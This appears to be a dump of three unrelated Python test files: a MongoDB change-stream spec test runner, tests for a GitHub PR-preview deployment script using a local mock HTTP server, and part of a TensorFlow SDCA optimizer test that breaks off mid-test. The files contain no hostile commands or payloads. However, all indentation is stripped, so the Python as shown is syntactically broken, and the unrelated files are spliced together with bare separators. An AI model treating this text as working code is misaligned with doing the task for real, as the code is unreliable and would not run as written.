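# 'resumeAfter' becomes 'resume_after'.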
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
def get_change_stream(client, scenario_def, test):
# Get target namespace on which to instantiate change stream
target = test["target"]
if target == "collection":
db = client.get_database(scenario_def["database_name"])
cs_target = db.get_collection(scenario_def["collection_name"])
elif target == "database":
cs_target = client.get_database(scenario_def["database_name"])
elif target == "client":
cs_target = client
else:
raise ValueError("Invalid target in spec")
# Construct change stream kwargs dict
cs_pipeline = test["changeStreamPipeline"]
options = test["changeStreamOptions"]
cs_options = {}
for key, value in options.items():
cs_options[camel_to_snake(key)] = value
# Create and return change stream
return cs_target.watch(pipeline=cs_pipeline, **cs_options)
def run_operation(client, operation):
# Apply specified operations
opname = camel_to_snake(operation["name"])
arguments = operation.get("arguments", {})
if opname == 'rename':
# Special case for rename operation.
arguments = {'new_name': arguments["to"]}
cmd = getattr(client.get_database(
operation["database"]).get_collection(
operation["collection"]), opname
)
return cmd(**arguments)
def create_test(scenario_def, test):
def run_scenario(self):
# Set up
self.setUpCluster(scenario_def)
self.setFailPoint(test)
is_error = test["result"].get("error", False)
try:
with get_change_stream(
self.client, scenario_def, test
) as change_stream:
for operation in test["operations"]:
# Run specified operations
run_operation(self.client, operation)
num_expected_changes = len(test["result"].get("success", []))
changes = [
change_stream.next() for _ in range(num_expected_changes)]
# Run a next() to induce an error if one is expected and
# there are no changes.
if is_error and not changes:
change_stream.next()
except OperationFailure as exc:
if not is_error:
raise
expected_code = test["result"]["error"]["code"]
self.assertEqual(exc.code, expected_code)
else:
# Check for expected output from change streams
if test["result"].get("success"):
for change, expected_changes in zip(changes, test["result"]["success"]):
self.assert_dict_is_subset(change, expected_changes)
self.assertEqual(len(changes), len(test["result"]["success"]))
finally:
# Check for expected events
results = self.listener.results
# Note: expectations may be missing, null, or a list of events.
# Extra events emitted by the test are intentionally ignored.
for idx, expectation in enumerate(test.get("expectations") or []):
for event_type, event_desc in expectation.items():
results_key = event_type.split("_")[1]
event = results[results_key][idx] if len(results[results_key]) > idx else None
self.check_event(event, event_desc)
return run_scenario
def create_tests():
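# Walk the legacy spec-test JSON files, wrap each scenario with the required
# server-version and topology decorators, and attach the generated test
# methods to TestAllLegacyScenarios.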
for dirpath, _, filenames in os.walk(os.path.join(_TEST_PATH, 'legacy')):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = json_util.loads(scenario_stream.read())
test_type = os.path.splitext(filename)[0]
for test in scenario_def['tests']:
new_test = create_test(scenario_def, test)
new_test = client_context.require_no_mmap(new_test)
if 'minServerVersion' in test:
min_ver = tuple(
int(elt) for
elt in test['minServerVersion'].split('.'))
new_test = client_context.require_version_min(*min_ver)(
new_test)
if 'maxServerVersion' in test:
max_ver = tuple(
int(elt) for
elt in test['maxServerVersion'].split('.'))
new_test = client_context.require_version_max(*max_ver)(
new_test)
topologies = test['topology']
new_test = client_context.require_cluster_type(topologies)(
new_test)
test_name = 'test_%s_%s_%s' % (
dirname,
test_type.replace("-", "_"),
str(test['description'].replace(" ", "_")))
new_test.__name__ = test_name
setattr(TestAllLegacyScenarios, new_test.__name__, new_test)
create_tests()
globals().update(generate_test_classes(
os.path.join(_TEST_PATH, 'unified'),
module=__name__,))
if __name__ == '__main__':
unittest.main()
|
test_pr_preview.py
|
try:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 3 case
from http.server import BaseHTTPRequestHandler, HTTPServer
import contextlib
import errno
import json
import os
import shutil
import stat
import subprocess
import tempfile
import threading
subject = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', 'pr_preview.py'
)
test_host = 'localhost'
def same_members(a, b):
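# Order-insensitive comparison: True only if a and b contain exactly the same
# elements with the same multiplicities.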
if len(a) != len(b):
return False
a_copy = list(a)
for elem in b:
try:
a_copy.remove(elem)
except ValueError:
return False
return len(a_copy) == 0
# When these tests are executed in Windows, files in the temporary git
# repositories may be marked as "read only" at the moment they are intended to
# be deleted. The following handler for `shutil.rmtree` accounts for this by
# making the files writable and attempting to delete them a second time.
#
# Source:
# https://stackoverflow.com/questions/1213706/what-user-do-python-scripts-run-as-in-windows
def handle_remove_readonly(func, path, exc):
excvalue = exc[1]
candidates = (os.rmdir, os.remove, os.unlink)
if func in candidates and excvalue.errno == errno.EACCES:
os.chmod(path, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO) # 0777
func(path)
else:
raise
class MockHandler(BaseHTTPRequestHandler, object):
def do_all(self):
path = self.path.split('?')[0]
request_body = None
if 'Content-Length' in self.headers:
request_body = self.rfile.read(
int(self.headers['Content-Length'])
).decode('utf-8')
if self.headers.get('Content-Type') == 'application/json':
request_body = json.loads(request_body)
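# Find the first expected (method, path, body-subset) entry that matches this
# request; unmatched requests fall through to the 400 response below.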
for request, response in self.server.expected_traffic:
if request[0] != self.command:
continue
if request[1] != path:
continue
body_matches = True
for key in request[2]:
body_matches &= request[2][key] == request_body.get(key)
if not body_matches:
continue
break
else:
request = (self.command, path, request_body)
response = (400, {})
self.server.actual_traffic.append((request, response))
self.send_response(response[0])
self.end_headers()
self.wfile.write(json.dumps(response[1]).encode('utf-8'))
def do_DELETE(self):
return self.do_all()
def do_GET(self):
return self.do_all()
def do_PATCH(self):
return self.do_all()
def do_POST(self):
return self.do_all()
class MockServer(HTTPServer, object):
'''HTTP server that responds to each request with the status code and body
paired with the first matching entry in `expected_traffic`, and with status
code 400 and body '{}' when no entry matches.'''
def __init__(self, address, expected_traffic):
super(MockServer, self).__init__(address, MockHandler)
self.expected_traffic = expected_traffic
self.actual_traffic = []
def __enter__(self):
threading.Thread(target=lambda: self.serve_forever()).start()
return self
def __exit__(self, *args):
self.shutdown()
class Requests(object):
get_rate = ('GET', '/rate_limit', {})
search = ('GET', '/search/issues', {})
ref_create_open = (
'POST', '/repos/test-org/test-repo/git/refs', {'ref':'refs/prs-open/23'}
)
ref_create_trusted = (
'POST',
'/repos/test-org/test-repo/git/refs',
{'ref':'refs/prs-trusted-for-preview/23'}
)
ref_update_open = (
'PATCH', '/repos/test-org/test-repo/git/refs/prs-open/23', {}
)
ref_update_trusted = (
'PATCH', '/repos/test-org/test-repo/git/refs/prs-trusted-for-preview/23', {}
)
deployment_get = ('GET', '/repos/test-org/test-repo/deployments', {})
deployment_create = ('POST', '/repos/test-org/test-repo/deployments', {})
deployment_status_create_pending = (
'POST',
'/repos/test-org/test-repo/deployments/24601/statuses',
{'state':'pending'}
)
deployment_status_create_error = (
'POST',
'/repos/test-org/test-repo/deployments/24601/statuses',
{'state':'error'}
)
deployment_status_create_success = (
'POST',
'/repos/test-org/test-repo/deployments/24601/statuses',
{'state':'success'}
)
preview = ('GET', '/.git/worktrees/45/HEAD', {})
class Responses(object):
no_limit = (200, {
'resources': {
'search': {
'remaining': 100,
'limit': 100
},
'core': {
'remaining': 100,
'limit': 100
}
}
})
@contextlib.contextmanager
def temp_repo():
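# Create a throwaway git repository with a single empty commit; the directory
# is deleted on exit, tolerating read-only files on Windows.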
directory = tempfile.mkdtemp()
try:
subprocess.check_call(['git', 'init'], cwd=directory)
subprocess.check_call(
['git', 'config', 'user.name', 'example'],
cwd=directory
)
subprocess.check_call(
['git', 'config', 'user.email', 'example@example.com'],
cwd=directory
)
subprocess.check_call(
['git', 'commit', '--allow-empty', '-m', 'first'],
cwd=directory
)
yield directory
finally:
shutil.rmtree(
directory, ignore_errors=False, onerror=handle_remove_readonly
)
def synchronize(expected_traffic, refs={}):
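# Run `pr_preview.py synchronize` against a mock GitHub API and a pair of
# temporary git repositories seeded with `refs`; returns the exit code, the
# traffic the mock server recorded, and the refs left on the remote.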
env = {
'DEPLOY_TOKEN': 'c0ffee'
}
env.update(os.environ)
server = MockServer((test_host, 0), expected_traffic)
test_port = server.server_address[1]
remote_refs = {}
with temp_repo() as local_repo, temp_repo() as remote_repo, server:
subprocess.check_call(
['git', 'commit', '--allow-empty', '-m', 'first'],
cwd=remote_repo
)
subprocess.check_call(
['git', 'commit', '--allow-empty', '-m', 'second'],
cwd=remote_repo
)
subprocess.check_call(
['git', 'remote', 'add', 'origin', remote_repo], cwd=local_repo
)
for name, value in refs.items():
subprocess.check_call(
['git', 'update-ref', name, value],
cwd=remote_repo
)
child = subprocess.Popen(
[
'python',
subject,
'--host',
'http://{}:{}'.format(test_host, test_port),
'--github-project',
'test-org/test-repo',
'synchronize',
'--window',
'3000'
],
cwd=local_repo,
env=env
)
child.communicate()
lines = subprocess.check_output(
['git', 'ls-remote', 'origin'], cwd=local_repo
)
for line in lines.decode('utf-8').strip().split('\n'):
revision, ref = line.split()
if not ref or ref in ('HEAD', 'refs/heads/master'):
continue
remote_refs[ref] = revision
return child.returncode, server.actual_traffic, remote_refs
def detect(event, expected_github_traffic, expected_preview_traffic):
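# Run `pr_preview.py detect` with the given GitHub event written to
# GITHUB_EVENT_PATH, against mock GitHub and preview servers; returns the exit
# code and the traffic each server recorded.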
env = {
'DEPLOY_TOKEN': 'c0ffee'
}
env.update(os.environ)
github_server = MockServer((test_host, 0), expected_github_traffic)
github_port = github_server.server_address[1]
preview_server = MockServer((test_host, 0), expected_preview_traffic)
preview_port = preview_server.server_address[1]
with temp_repo() as repo, github_server, preview_server:
env['GITHUB_EVENT_PATH'] = repo + '/event.json'
with open(env['GITHUB_EVENT_PATH'], 'w') as handle:
handle.write(json.dumps(event))
child = subprocess.Popen(
[
'python',
subject,
'--host',
'http://{}:{}'.format(test_host, github_port),
'--github-project',
'test-org/test-repo',
'detect',
'--target',
'http://{}:{}'.format(test_host, preview_port),
'--timeout',
'1'
],
cwd=repo,
env=env
)
child.communicate()
return (
child.returncode,
github_server.actual_traffic,
preview_server.actual_traffic
)
def test_synchronize_zero_results():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [],
'incomplete_results': False
}
))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_fail_search_throttled():
expected_traffic = [
(Requests.get_rate, (
200,
{
'resources': {
'search': {
'remaining': 1,
'limit': 10
}
}
}
))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode != 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_fail_incomplete_results():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [],
'incomplete_results': True
}
))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode != 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_ignore_closed():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': '2019-10-28',
'user': {'login': 'grace'},
'author_association': 'COLLABORATOR'
}
],
'incomplete_results': False
}
))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_sync_collaborator():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': None,
'user': {'login': 'grace'},
'author_association': 'COLLABORATOR'
}
],
'incomplete_results': False
}
)),
(Requests.ref_create_open, (200, {})),
(Requests.ref_create_trusted, (200, {})),
(Requests.deployment_get, (200, {})),
(Requests.deployment_create, (200, {}))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_ignore_collaborator_bot():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': None,
'user': {'login': 'chromium-wpt-export-bot'},
'author_association': 'COLLABORATOR'
}
],
'incomplete_results': False
}
))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_ignore_untrusted_contributor():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': None,
'user': {'login': 'grace'},
'author_association': 'CONTRIBUTOR'
}
],
'incomplete_results': False
}
))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_sync_trusted_contributor():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [
{
'number': 23,
'labels': [{'name': 'safe for preview'}],
'closed_at': None,
'user': {'login': 'Hexcles'},
'author_association': 'CONTRIBUTOR'
}
],
'incomplete_results': False
}
)),
(Requests.ref_create_open, (200, {})),
(Requests.ref_create_trusted, (200, {})),
(Requests.deployment_get, (200, [])),
(Requests.deployment_create, (200, {}))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_update_collaborator():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.search, (200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': None,
'user': {'login': 'grace'},
'author_association': 'COLLABORATOR'
}
],
'incomplete_results': False
}
)),
(Requests.deployment_get, (200, [])),
(Requests.ref_update_open, (200, {})),
(Requests.ref_update_trusted, (200, {})),
(Requests.deployment_create, (200, {}))
]
refs = {
'refs/pull/23/head': 'HEAD',
'refs/prs-open/23': 'HEAD~',
'refs/prs-trusted-for-preview/23': 'HEAD~'
}
returncode, actual_traffic, remote_refs = synchronize(expected_traffic, refs)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_update_member():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.search, (200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': None,
'user': {'login': 'grace'},
'author_association': 'MEMBER'
}
],
'incomplete_results': False
}
)),
(Requests.deployment_get, (200, [{'some': 'deployment'}])),
(Requests.ref_update_open, (200, {})),
(Requests.ref_update_trusted, (200, {}))
]
refs = {
'refs/pull/23/head': 'HEAD',
'refs/prs-open/23': 'HEAD~',
'refs/prs-trusted-for-preview/23': 'HEAD~'
}
returncode, actual_traffic, remote_refs = synchronize(expected_traffic, refs)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_delete_collaborator():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': '2019-10-30',
'user': {'login': 'grace'},
'author_association': 'COLLABORATOR'
}
],
'incomplete_results': False
}
))
]
refs = {
'refs/pull/23/head': 'HEAD',
'refs/prs-open/23': 'HEAD~',
'refs/prs-trusted-for-preview/23': 'HEAD~'
}
returncode, actual_traffic, remote_refs = synchronize(expected_traffic, refs)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
assert list(remote_refs) == ['refs/pull/23/head']
def test_detect_ignore_unknown_env():
expected_github_traffic = []
expected_preview_traffic = []
event = {
'deployment': {
'id': 24601,
'environment': 'ghosts',
'sha': '3232'
}
}
returncode, actual_github_traffic, actual_preview_traffic = detect(
event, expected_github_traffic, expected_preview_traffic
)
assert returncode == 0
assert len(actual_github_traffic) == 0
assert len(actual_preview_traffic) == 0
def test_detect_fail_search_throttled():
expected_github_traffic = [
(Requests.get_rate, (
200,
{
'resources': {
'core': {
'remaining': 1,
'limit': 10
}
}
}
))
]
expected_preview_traffic = []
event = {
'deployment': {
'id': 24601,
'environment': 'wpt-preview-45',
'sha': '3232'
}
}
returncode, actual_github_traffic, actual_preview_traffic = detect(
event, expected_github_traffic, expected_preview_traffic
)
assert returncode == 1
assert actual_github_traffic == expected_github_traffic
assert actual_preview_traffic == expected_preview_traffic
def test_detect_success():
expected_github_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_pending, (200, {})),
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_success, (200, {}))
]
expected_preview_traffic = [
(Requests.preview, (200, 3232))
]
event = {
'deployment': {
'id': 24601,
'environment': 'wpt-preview-45',
'sha': '3232'
}
}
returncode, actual_github_traffic, actual_preview_traffic = detect(
event, expected_github_traffic, expected_preview_traffic
)
assert returncode == 0
assert actual_github_traffic == expected_github_traffic
assert actual_preview_traffic == expected_preview_traffic
def test_detect_timeout_missing():
expected_github_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_pending, (200, {})),
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_error, (200, {}))
]
expected_preview_traffic = [
(Requests.preview, (404, {}))
]
event = {
'deployment': {
'id': 24601,
'environment': 'wpt-preview-45',
'sha': '3232'
}
}
returncode, actual_github_traffic, actual_preview_traffic = detect(
event, expected_github_traffic, expected_preview_traffic
)
assert returncode == 1
assert expected_github_traffic == actual_github_traffic
ping_count = len(actual_preview_traffic)
assert ping_count > 0
assert actual_preview_traffic == expected_preview_traffic * ping_count
def test_detect_timeout_wrong_revision():
expected_github_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_pending, (200, {})),
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_error, (200, {}))
]
expected_preview_traffic = [
(Requests.preview, (200, 1234))
]
event = {
'deployment': {
'id': 24601,
'environment': 'wpt-preview-45',
'sha': '3232'
}
}
returncode, actual_github_traffic, actual_preview_traffic = detect(
event, expected_github_traffic, expected_preview_traffic
)
assert returncode == 1
assert expected_github_traffic == actual_github_traffic
ping_count = len(actual_preview_traffic)
assert ping_count > 0
assert actual_preview_traffic == expected_preview_traffic * ping_count
|
sdca_ops_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SdcaModel."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
from tensorflow.contrib.linear_optimizer.python.ops.sdca_ops import SdcaModel
from tensorflow.contrib.linear_optimizer.python.ops.sparse_feature_column import SparseFeatureColumn
from tensorflow.core.example import example_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_sdca_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import googletest
_MAX_ITERATIONS = 100
_SHARD_NUMBERS = [None, 1, 3]
_NUM_LOSS_PARTITIONS = [4]
def make_example_proto(feature_dict, target, value=1.0):
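# Build an Example proto with a float 'target' feature and, for every key in
# feature_dict, parallel '<key>_indices' (int64) and '<key>_values' (float)
# features.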
e = example_pb2.Example()
features = e.features
features.feature['target'].float_list.value.append(target)
for key, values in feature_dict.items():
features.feature[key + '_indices'].int64_list.value.extend(values)
features.feature[key + '_values'].float_list.value.extend([value] *
len(values))
return e
def make_example_dict(example_protos, example_weights):
def parse_examples(example_protos):
features = {
'target':
parsing_ops.FixedLenFeature(
shape=[1], dtype=dtypes.float32, default_value=0),
'age_indices':
parsing_ops.VarLenFeature(dtype=dtypes.int64),
'age_values':
parsing_ops.VarLenFeature(dtype=dtypes.float32),
'gender_indices':
parsing_ops.VarLenFeature(dtype=dtypes.int64),
'gender_values':
parsing_ops.VarLenFeature(dtype=dtypes.float32)
}
return parsing_ops.parse_example(
[e.SerializeToString() for e in example_protos], features)
parsed = parse_examples(example_protos)
sparse_features = [
SparseFeatureColumn(
array_ops.reshape(
array_ops.split(
value=parsed['age_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
array_ops.reshape(parsed['age_indices'].values, [-1]),
array_ops.reshape(parsed['age_values'].values, [-1])),
SparseFeatureColumn(
array_ops.reshape(
array_ops.split(
value=parsed['gender_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
array_ops.reshape(parsed['gender_indices'].values, [-1]),
array_ops.reshape(parsed['gender_values'].values, [-1]))
]
return dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=example_weights,
example_labels=array_ops.reshape(parsed['target'], [-1]),
example_ids=['%d' % i for i in range(0, len(example_protos))])
def make_random_examples_and_variables_dicts(num_examples, dim, num_non_zero):
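# Generate `num_examples` random examples, each with `num_non_zero` active
# features drawn from a `dim`-dimensional space with value
# num_non_zero**(-0.5), plus a matching zero-initialized weight variable.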
random.seed(1)
sparse_features = [
SparseFeatureColumn(
[i for i in range(num_examples) for _ in range(num_non_zero)], [
i for _ in range(num_examples)
for i in random.sample(range(dim), num_non_zero)
],
[num_non_zero**(-0.5) for _ in range(num_examples * num_non_zero)])
]
examples_dict = dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=[random.random() for _ in range(num_examples)],
example_labels=[
1. if random.random() > 0.5 else 0. for _ in range(num_examples)
],
example_ids=[str(i) for i in range(num_examples)])
weights = variables_lib.Variable(
array_ops.zeros([dim], dtype=dtypes.float32))
variables_dict = dict(
sparse_features_weights=[weights],
dense_features_weights=[])
return examples_dict, variables_dict
def make_variable_dict(max_age, max_gender, partitioned=False):
# TODO(sibyl-toe9oF2e): Figure out how to derive max_age & max_gender from
# examples_dict.
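# Create zero-initialized weight variables for the 'age' and 'gender' sparse
# features, optionally split across two partitions.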
partitioner = None
if partitioned:
partitioner = partitioned_variables.fixed_size_partitioner(num_shards=2,
axis=0)
with variable_scope.variable_scope(
name_or_scope='variables',
partitioner=partitioner):
age_weights = variables_lib.Variable(
array_ops.zeros(
[max_age + 1], dtype=dtypes.float32))
gender_weights = variables_lib.Variable(
array_ops.zeros(
[max_gender + 1], dtype=dtypes.float32))
return dict(
sparse_features_weights=[age_weights, gender_weights],
dense_features_weights=[])
def make_dense_examples_and_variables_dicts(dense_features_values, weights,
labels):
"""Creates examples and variables dictionaries for dense features.
Variable shapes are inferred from the list of dense feature values passed as
an argument.
Args:
dense_features_values: The values of the dense features
weights: The example weights.
labels: The example labels.
Returns:
One dictionary for the examples and one for the variables.
"""
dense_tensors = []
dense_weights = []
for dense_feature in dense_features_values:
dense_tensor = ops.convert_to_tensor(dense_feature, dtype=dtypes.float32)
check_shape_op = control_flow_ops.Assert(
math_ops.less_equal(array_ops.rank(dense_tensor), 2),
['dense_tensor shape must be [batch_size, dimension] or [batch_size]'])
# Reshape to [batch_size, dense_column_dimension].
with ops.control_dependencies([check_shape_op]):
dense_tensor = array_ops.reshape(
dense_tensor, [dense_tensor.get_shape().as_list()[0], -1])
dense_tensors.append(dense_tensor)
# Add variables of shape [feature_column_dimension].
dense_weights.append(
variables_lib.Variable(
array_ops.zeros(
[dense_tensor.get_shape().as_list()[1]], dtype=dtypes.float32)))
examples_dict = dict(
sparse_features=[],
dense_features=dense_tensors,
example_weights=weights,
example_labels=labels,
example_ids=['%d' % i for i in range(0, len(labels))])
variables_dict = dict(
sparse_features_weights=[], dense_features_weights=dense_weights)
return examples_dict, variables_dict
def get_binary_predictions_for_logistic(predictions, cutoff=0.5):
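# Threshold probabilistic predictions at `cutoff` (default 0.5) and return
# int32 0/1 labels.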
return math_ops.cast(
math_ops.greater_equal(predictions,
array_ops.ones_like(predictions) * cutoff),
dtype=dtypes.int32)
def get_binary_predictions_for_hinge(predictions):
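# Threshold raw hinge scores at zero and return int32 0/1 labels.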
return math_ops.cast(
math_ops.greater_equal(predictions, array_ops.zeros_like(predictions)),
dtype=dtypes.int32)
# TODO(sibyl-Mooth6ku): Add tests that exercise L1 and Shrinking.
# TODO(sibyl-vie3Poto): Refactor tests to avoid repetition of boilerplate code.
class SdcaModelTest(TensorFlowTestCase):
"""Base SDCA optimizer test class for any loss type."""
def _single_threaded_test_session(self):
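# Limit the session to a single inter-op and intra-op thread (presumably to
# keep the SDCA updates in these tests deterministic).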
config = config_pb2.ConfigProto(
inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
return self.test_session(use_gpu=False, config=config)
class SdcaWithLogisticLossTest(SdcaModelTest):
"""SDCA optimizer test class for logistic loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testPartitionedPrimals(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, partitioned=True)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSparseRandom(self):
dim = 20
num_examples = 1000
# Number of non-zero features per example.
non_zeros = 10
# Setup test data.
with self._single_threaded_test_session():
examples, variables = make_random_examples_and_variables_dicts(
num_examples, dim, non_zeros)
options = dict(
symmetric_l2_regularization=.1,
symmetric_l1_regularization=0,
num_table_shards=1,
adaptive=False,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
for _ in range(4):
train_op.run()
lr.update_weights(train_op).run()
# Duality gap is 1.4e-5.
# It would be 0.01 without shuffling and 0.02 with adaptive sampling.
self.assertNear(0.0, lr.approximate_duality_gap().eval(), err=1e-3)
def testSparseDuplicate(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0] * 5,
'gender': [0] * 5
}, 0),
make_example_proto({
'age': [1] * 5,
'gender': [1] * 5
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'Duplicate'):
train_op.run()
def testDistributedSimple(self):
# Distributed SDCA may not converge if the workers concurrently update the
# same example. In this test the examples are partitioned across workers:
# each worker sees the same examples, only the example_ids differ.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
